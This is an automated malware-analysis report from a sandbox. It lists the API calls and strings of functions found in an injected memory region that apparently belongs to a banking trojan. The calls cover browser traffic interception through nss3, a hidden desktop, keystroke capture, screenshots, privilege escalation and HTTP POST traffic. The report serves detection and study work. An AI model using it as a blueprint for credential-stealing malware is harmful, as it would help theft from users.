Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B4CDD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 001B4CEE
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 001B4D0D
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 001B4D19
CreateProcessAsUserW.ADVAPI32(?,00000000,001BC8F5,00000000,00000000,00000000,001BC8F5,001BC8F5,00000000,?,?,?,00000000,00000044), ref: 001B4D8A
CloseHandle.KERNEL32(?), ref: 001B4D9D
CloseHandle.KERNEL32(?), ref: 001B4DA2
FreeLibrary.KERNEL32(?), ref: 001B4DB9

Strings

userenv.dll, xrefs: 001B4CE6
CreateEnvironmentBlock, xrefs: 001B4D07
DestroyEnvironmentBlock, xrefs: 001B4D0F

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AC103, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 44

APIs

GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,001B20A9), ref: 001AC111
GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,001B20A9), ref: 001AC125
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 001AC132
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 001AC13F
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 001AC14C

Part of subcall function 001ABE3B: VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,001AC160,001C2360), ref: 001ABE72

Part of subcall function 001BB58C: InitializeCriticalSection.KERNEL32(001C3FE4,76C61857,001AC185,001C2360), ref: 001BB5A2
Part of subcall function 001BB58C: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 001BB5DE
Part of subcall function 001BB58C: GetProcAddress.KERNEL32(PR_SetError), ref: 001BB5F0
Part of subcall function 001BB58C: GetProcAddress.KERNEL32(PR_GetError), ref: 001BB602

Strings

nss3.dll, xrefs: 001AC10C
PR_OpenTCPSocket, xrefs: 001AC11F
PR_Close, xrefs: 001AC127
PR_Read, xrefs: 001AC134
PR_Write, xrefs: 001AC141

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A5C8A, Relevance: 16.6, APIs: 11, Instructions: 118

APIs

Part of subcall function 001ADCA2: GetClassNameW.USER32(001E01CA,?,00000101), ref: 001ADCBD

GetWindowThreadProcessId.USER32(?,?), ref: 001A5CB4
ResetEvent.KERNEL32(00000010), ref: 001A5D03
PostMessageW.USER32(?,?,?,00000010), ref: 001A5D26
WaitForSingleObject.KERNEL32(00000010,00000064), ref: 001A5D35

Part of subcall function 001A5B28: WaitForSingleObject.KERNEL32(?,00000000), ref: 001A5B40
Part of subcall function 001A5B28: ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 001A5B9A
Part of subcall function 001A5B28: WaitForSingleObject.KERNEL32(?,000003E8), ref: 001A5BD6
Part of subcall function 001A5B28: TerminateProcess.KERNEL32(?,00000000), ref: 001A5BE3

ResetEvent.KERNEL32(?,?,?,00000010), ref: 001A5D60
PostThreadMessageW.USER32(?,?,000000FC,?), ref: 001A5D70
WaitForSingleObject.KERNEL32(?,000003E8), ref: 001A5D82
TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 001A5DA7

Part of subcall function 001B4DCA: CloseHandle.KERNEL32(00000000), ref: 001B4DD9
Part of subcall function 001B4DCA: CloseHandle.KERNEL32(00000000), ref: 001B4DE2

IntersectRect.USER32(?,?), ref: 001A5DC7
FillRect.USER32(?,?,00000006), ref: 001A5DD9
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 001A5DED

Part of subcall function 001B7A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 001B7AB5

Part of subcall function 001B6B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,001B2E87,?,19367401,?,00000001,8889347B,00000002), ref: 001B6BA9
Part of subcall function 001B6B9E: CloseHandle.KERNEL32(00000000), ref: 001B6BB4

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AB5AA, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274

APIs

Part of subcall function 001B7AF0: WindowFromPoint.USER32(?,?), ref: 001B7B0C
Part of subcall function 001B7AF0: SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 001B7B3D
Part of subcall function 001B7AF0: GetWindowLongW.USER32(00000000,000000F0), ref: 001B7B61
Part of subcall function 001B7AF0: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001B7B72
Part of subcall function 001B7AF0: GetWindowLongW.USER32(?,000000F0), ref: 001B7B8F
Part of subcall function 001B7AF0: SetWindowLongW.USER32(?,000000F0,00000000), ref: 001B7B9D

GetWindowLongW.USER32(00000000,000000F0), ref: 001AB6B6
GetParent.USER32(00000000), ref: 001AB6D8
GetWindowThreadProcessId.USER32(?,00000000), ref: 001AB6FD
IsWindow.USER32(?), ref: 001AB720

Part of subcall function 001AB0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001AB0B3
Part of subcall function 001AB0AD: ReleaseMutex.KERNEL32(?), ref: 001AB0E7
Part of subcall function 001AB0AD: IsWindow.USER32(?), ref: 001AB0EE
Part of subcall function 001AB0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 001AB108
Part of subcall function 001AB0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 001AB110

GetWindowInfo.USER32(00000000,?), ref: 001AB770
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 001AB8AD

Part of subcall function 001AB31C: GetAncestor.USER32(?,00000002), ref: 001AB345
Part of subcall function 001AB31C: SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 001AB370
Part of subcall function 001AB31C: PostMessageW.USER32(?,00000020,?,00000000), ref: 001AB3B2
Part of subcall function 001AB31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 001AB448
Part of subcall function 001AB31C: PostMessageW.USER32(?,00000112,?,?), ref: 001AB49B
Part of subcall function 001AB31C: GetWindowThreadProcessId.USER32(?,00000000), ref: 001AB4DA

Part of subcall function 001ADCA2: GetClassNameW.USER32(001E01CA,?,00000101), ref: 001ADCBD

Part of subcall function 001AB11C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001AB130
Part of subcall function 001AB11C: ReleaseMutex.KERNEL32(?), ref: 001AB14F
Part of subcall function 001AB11C: GetWindowRect.USER32(?,?), ref: 001AB15C
Part of subcall function 001AB11C: IsRectEmpty.USER32(?), ref: 001AB1E0
Part of subcall function 001AB11C: GetWindowLongW.USER32(?,000000F0), ref: 001AB1EF
Part of subcall function 001AB11C: GetParent.USER32(?), ref: 001AB205
Part of subcall function 001AB11C: MapWindowPoints.USER32(00000000,00000000), ref: 001AB20E
Part of subcall function 001AB11C: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 001AB232

Strings

, xrefs: 001AB654
@, xrefs: 001AB806
<, xrefs: 001AB769

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A4DBD, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151

APIs

Part of subcall function 001B2507: CreateMutexW.KERNEL32(001C2C30,00000000,?,?,?,?,?), ref: 001B2528

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

WaitForSingleObject.KERNEL32(000003E8,?), ref: 001A4E28
CloseHandle.KERNEL32(?), ref: 001A4F89

Part of subcall function 001AE959: CreateMutexW.KERNELBASE(001C2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,001A4E69,?,?,?,743C152E,00000002), ref: 001AE97F

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 001A4EB9
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 001A4EFA
WSAIoctl.WS2_32(00000000,8004667E,?,00000004,00000000,00000000,?,00000000,00000000), ref: 001A4F1A

Part of subcall function 001B67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 001B67CC

Part of subcall function 001B4DF0: CreateThread.KERNEL32(00000000,?,00000000,001A748F,00000000,001A748F), ref: 001B4E04
Part of subcall function 001B4DF0: CloseHandle.KERNEL32(00000000), ref: 001B4E0F

accept.WS2_32(?,00000000,00000000), ref: 001A4F45
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 001A4F59

Part of subcall function 001B675E: shutdown.WS2_32(?,00000002), ref: 001B6766
Part of subcall function 001B675E: #3.WS2_32(?), ref: 001B676D

CloseHandle.KERNEL32(?), ref: 001A4F7A

Part of subcall function 001B6B8E: ReleaseMutex.KERNEL32(00000000,001B3021,?,?,?), ref: 001B6B92

Part of subcall function 001AE89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 001AE8E0

Part of subcall function 001A4C68: getsockname.WS2_32(?,?,?), ref: 001A4CBE
Part of subcall function 001A4C68: CloseHandle.KERNEL32(?), ref: 001A4CE2

Strings

K2w, xrefs: 001A4EC7

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BD865, Relevance: 15.1, APIs: 10, Instructions: 92

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 001BD88A
CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 001BD89D
GetProcessWindowStation.USER32 ref: 001BD8AE

Part of subcall function 001BD83D: GetProcessWindowStation.USER32 ref: 001BD841
Part of subcall function 001BD83D: SetProcessWindowStation.USER32(00000000), ref: 001BD855

OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 001BD8E9
CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 001BD8FD
GetCurrentThreadId.KERNEL32(?,?,?,001A731A,?,2937498D,?,00000000), ref: 001BD909
GetThreadDesktop.USER32(00000000), ref: 001BD910

Part of subcall function 001BD7F8: lstrcmpiW.KERNEL32(00000000,00000000,00000000,?,00000000,10000000,00000000,001BD84D,00000000,?,?,?,001A731A,?,2937498D,?), ref: 001BD81D

SetThreadDesktop.USER32(00000000), ref: 001BD922
CloseDesktop.USER32(00000000), ref: 001BD934
CloseWindowStation.USER32(?), ref: 001BD94F

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A773A, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160

APIs

Part of subcall function 001B2507: CreateMutexW.KERNEL32(001C2C30,00000000,?,?,?,?,?), ref: 001B2528

GetCurrentThread.KERNEL32(000000F1,743C1521,00000002), ref: 001A775B
SetThreadPriority.KERNEL32(00000000), ref: 001A7762

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

WaitForSingleObject.KERNEL32(0000EA60), ref: 001A7780

Part of subcall function 001B9A9E: RegOpenKeyExW.ADVAPI32(80000001,001C3EC0,00000000,00000001,?), ref: 001B9ADD

CreateMutexW.KERNEL32(001C2C30,00000001,?,20000000), ref: 001A7843
GetLastError.KERNEL32 ref: 001A7853
CloseHandle.KERNEL32(00000000), ref: 001A7861

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

Part of subcall function 001B4DF0: CreateThread.KERNEL32(00000000,?,00000000,001A748F,00000000,001A748F), ref: 001B4E04
Part of subcall function 001B4DF0: CloseHandle.KERNEL32(00000000), ref: 001B4E0F

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

WaitForSingleObject.KERNEL32(0000EA60), ref: 001A7919

Part of subcall function 001B6B8E: ReleaseMutex.KERNEL32(00000000,001B3021,?,?,?), ref: 001B6B92

Strings

Global\%08X%08X%08X, xrefs: 001A781D

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BC912, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99

APIs

LoadLibraryW.KERNEL32(?), ref: 001BC929
GetProcAddress.KERNEL32(?,?,.exe,00000000,?,?,?,?,?,?,?,?,?,?,?,001BD2A8), ref: 001BC955
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,001BD2A8,?,?), ref: 001BC96C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,001BD2A8,?,?), ref: 001BC984
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001BD2A8,?,?,00000000), ref: 001BCA0D

Part of subcall function 001B4A87: GetCurrentThread.KERNEL32(00000020,00000000,001BC9A1,00000000,?,?,?,?,001BC9A1,SeTcbPrivilege), ref: 001B4A97
Part of subcall function 001B4A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,001BC9A1,SeTcbPrivilege), ref: 001B4A9E
Part of subcall function 001B4A87: OpenProcessToken.ADVAPI32(000000FF,00000020,001BC9A1,?,?,?,?,001BC9A1,SeTcbPrivilege), ref: 001B4AB0
Part of subcall function 001B4A87: LookupPrivilegeValueW.ADVAPI32(00000000,001BC9A1,?), ref: 001B4AD4
Part of subcall function 001B4A87: AdjustTokenPrivileges.ADVAPI32(001BC9A1,00000000,00000001,00000000,00000000,00000000), ref: 001B4AE9
Part of subcall function 001B4A87: GetLastError.KERNEL32 ref: 001B4AF3
Part of subcall function 001B4A87: CloseHandle.KERNEL32(001BC9A1), ref: 001B4B02

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,001BD2A8,?,?,00000000), ref: 001BC9A1

Part of subcall function 001BC8A1: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,001BC9FB,00000000,?,?,?), ref: 001BC8C6
Part of subcall function 001BC8A1: CloseHandle.KERNEL32(?), ref: 001BC907

Strings

SeTcbPrivilege, xrefs: 001BC997
.exe, xrefs: 001BC93B

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B50A3, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,001C2000,8404F700,00000000), ref: 001B50EB
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 001B5112
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 001B5137
InternetCloseHandle.WININET(00000000), ref: 001B514F

Strings

Connection: close, xrefs: 001B5103, 001B5110
GET, xrefs: 001B50D0, 001B50E7
HTTP/1.1, xrefs: 001B50DF
POST, xrefs: 001B50C9

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BBD7B, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247

APIs

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

EnterCriticalSection.KERNEL32(001C3FE4), ref: 001BBDB7
LeaveCriticalSection.KERNEL32(001C3FE4), ref: 001BBDE5
EnterCriticalSection.KERNEL32(001C3FE4), ref: 001BBE09

Part of subcall function 001B14C3: InternetCrackUrlA.WININET ref: 001B17AC
Part of subcall function 001B14C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 001B17CA
Part of subcall function 001B14C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 001B18E4
Part of subcall function 001B14C3: EnterCriticalSection.KERNEL32(001C2AC8), ref: 001B1910
Part of subcall function 001B14C3: LeaveCriticalSection.KERNEL32(001C2AC8,?,?), ref: 001B194D

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

Part of subcall function 001B835E: StrCmpNIA.SHLWAPI(?,?,?), ref: 001B83B8

Part of subcall function 001B40F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 001B410D

Part of subcall function 001B3346: HeapAlloc.KERNEL32(00000008,-00000003,001B36F5,?,?,00000000,001B41E1,?,001B2070,?,?,?,001B4191,?,?,?), ref: 001B3368
Part of subcall function 001B3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,001B36F5,?,?,00000000,001B41E1,?,001B2070,?,?,?,001B4191,?,?), ref: 001B3379

LeaveCriticalSection.KERNEL32(001C3FE4,00000000,?,00000000), ref: 001BC04C

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

LeaveCriticalSection.KERNEL32(001C3FE4), ref: 001BC06B
LeaveCriticalSection.KERNEL32(001C3FE4), ref: 001BC078

Strings

Content-Length, xrefs: 001BBF55
%x, xrefs: 001BBF11
0, xrefs: 001BBF31

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A9489, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156

APIs

Part of subcall function 001B74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,001A7194,?,?,00000104,.exe,00000000), ref: 001B74F4
Part of subcall function 001B74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,001A7194,?,?,00000104), ref: 001B7575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 001A94EF

Part of subcall function 001A929D: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 001A92D4
Part of subcall function 001A929D: StrStrIW.SHLWAPI(?,?), ref: 001A935C
Part of subcall function 001A929D: StrStrIW.SHLWAPI(?,?), ref: 001A936D
Part of subcall function 001A929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 001A9389
Part of subcall function 001A929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 001A93A7
Part of subcall function 001A929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 001A93C1

PathRemoveFileSpecW.SHLWAPI(?), ref: 001A950C
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 001A9582

Part of subcall function 001B8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001B8B23
Part of subcall function 001B8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001B8B4A
Part of subcall function 001B8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 001B8B94
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 001B8BC1
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?), ref: 001B8BF1
Part of subcall function 001B8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 001B8C1F
Part of subcall function 001B8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 001B8C31

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 001A961F

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Strings

#, xrefs: 001A9567
$, xrefs: 001A9552
&, xrefs: 001A9560

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BAEFC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109

APIs

TranslateMessage.USER32(?), ref: 001BB053

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

EnterCriticalSection.KERNEL32(001C3FB4), ref: 001BAF36
LeaveCriticalSection.KERNEL32(001C3FB4), ref: 001BAFD9

Part of subcall function 001AEA11: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 001AEA43
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 001AEA54
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 001AEA61
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 001AEA6E
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 001AEA7B
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 001AEA88
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 001AEA95
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 001AEAA2
Part of subcall function 001AEA11: LoadLibraryA.KERNEL32(ole32.dll), ref: 001AEAEA
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 001AEAF5
Part of subcall function 001AEA11: LoadLibraryA.KERNEL32(gdi32.dll), ref: 001AEB07
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 001AEB12
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 001AEB1E
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 001AEB2B
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 001AEB38
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 001AEB45
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 001AEB52
Part of subcall function 001AEA11: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 001AEB5F
Part of subcall function 001AEA11: FreeLibrary.KERNEL32(00000000), ref: 001AEE9C
Part of subcall function 001AEA11: FreeLibrary.KERNEL32(?), ref: 001AEEA6
Part of subcall function 001AEA11: FreeLibrary.KERNEL32(00000000), ref: 001AEEB0

GetTickCount.KERNEL32(?,0000001E,000001F4), ref: 001BAF9B

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

GetKeyboardState.USER32(?), ref: 001BAFF3
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 001BB01B

Part of subcall function 001BAD5F: EnterCriticalSection.KERNEL32(001C3FB4,?,?,?,001BB052,?), ref: 001BAD7C
Part of subcall function 001BAD5F: LeaveCriticalSection.KERNEL32(001C3FB4,?,?,?,001BB052,?), ref: 001BAD9D
Part of subcall function 001BAD5F: EnterCriticalSection.KERNEL32(001C3FB4,?,?,?,?,001BB052,?), ref: 001BADAE
Part of subcall function 001BAD5F: LeaveCriticalSection.KERNEL32(001C3FB4,?,?,?,001BB052,?), ref: 001BAE47

Strings

, xrefs: 001BB039

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BC5CA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64

APIs

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 001BC5ED
EnterCriticalSection.KERNEL32(001C400C), ref: 001BC620
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 001BC640
lstrcmpiW.KERNEL32(?,nss3.dll), ref: 001BC64C

Part of subcall function 001AC103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,001B20A9), ref: 001AC111
Part of subcall function 001AC103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,001B20A9), ref: 001AC125
Part of subcall function 001AC103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 001AC132
Part of subcall function 001AC103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 001AC13F
Part of subcall function 001AC103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 001AC14C

LeaveCriticalSection.KERNEL32(001C400C), ref: 001BC669

Strings

nss3.dll, xrefs: 001BC646
nspr4.dll, xrefs: 001BC63A

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BB58C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30

APIs

InitializeCriticalSection.KERNEL32(001C3FE4,76C61857,001AC185,001C2360), ref: 001BB5A2
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 001BB5DE
GetProcAddress.KERNEL32(PR_SetError), ref: 001BB5F0
GetProcAddress.KERNEL32(PR_GetError), ref: 001BB602

Strings

PR_GetError, xrefs: 001BB5F2
PR_SetError, xrefs: 001BB5E0
PR_GetNameForIdentity, xrefs: 001BB5BE

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A7206, Relevance: 12.2, APIs: 8, Instructions: 180

APIs

Part of subcall function 001B6444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 001B6463
Part of subcall function 001B6444: freeaddrinfo.WS2_32(?,76C53E72,?,?,?,001A7518,?), ref: 001B64B0

GetCurrentThread.KERNEL32(00000001,?,00000003,?,?,00000000,?), ref: 001A72EB
SetThreadPriority.KERNEL32(00000000), ref: 001A72F2

Part of subcall function 001BD865: OpenWindowStationW.USER32(?,00000000,10000000), ref: 001BD88A
Part of subcall function 001BD865: CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 001BD89D
Part of subcall function 001BD865: GetProcessWindowStation.USER32 ref: 001BD8AE
Part of subcall function 001BD865: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 001BD8E9
Part of subcall function 001BD865: CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 001BD8FD
Part of subcall function 001BD865: GetCurrentThreadId.KERNEL32(?,?,?,001A731A,?,2937498D,?,00000000), ref: 001BD909
Part of subcall function 001BD865: GetThreadDesktop.USER32(00000000), ref: 001BD910
Part of subcall function 001BD865: SetThreadDesktop.USER32(00000000), ref: 001BD922
Part of subcall function 001BD865: CloseDesktop.USER32(00000000), ref: 001BD934
Part of subcall function 001BD865: CloseWindowStation.USER32(?), ref: 001BD94F

Part of subcall function 001ADD09: TlsAlloc.KERNEL32(001C2868,00000000,0000018C,00000000,00000000), ref: 001ADD22
Part of subcall function 001ADD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 001ADD4A
Part of subcall function 001ADD09: CreateEventW.KERNEL32(001C2C30,00000001,00000000,?,84889912,?,00000001), ref: 001ADD74
Part of subcall function 001ADD09: CreateMutexW.KERNEL32(001C2C30,00000000,?,18782822,?,00000001), ref: 001ADD97
Part of subcall function 001ADD09: CreateFileMappingW.KERNEL32(00000000,001C2C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 001ADDC2
Part of subcall function 001ADD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 001ADDD8
Part of subcall function 001ADD09: GetDC.USER32(00000000), ref: 001ADDF5
Part of subcall function 001ADD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 001ADE15
Part of subcall function 001ADD09: GetDeviceCaps.GDI32(?,0000000A), ref: 001ADE1F
Part of subcall function 001ADD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 001ADE32
Part of subcall function 001ADD09: ReleaseDC.USER32(00000000,?), ref: 001ADE56
Part of subcall function 001ADD09: CreateMutexW.KERNEL32(001C2C30,00000000,?,1898B122,?,00000001,001C28B8,?,00000102,001C28A4,001C2E70,00000010,?,?), ref: 001ADF00
Part of subcall function 001ADD09: GetDC.USER32(00000000), ref: 001ADF15
Part of subcall function 001ADD09: CreateCompatibleDC.GDI32(00000000), ref: 001ADF23
Part of subcall function 001ADD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 001ADF3A
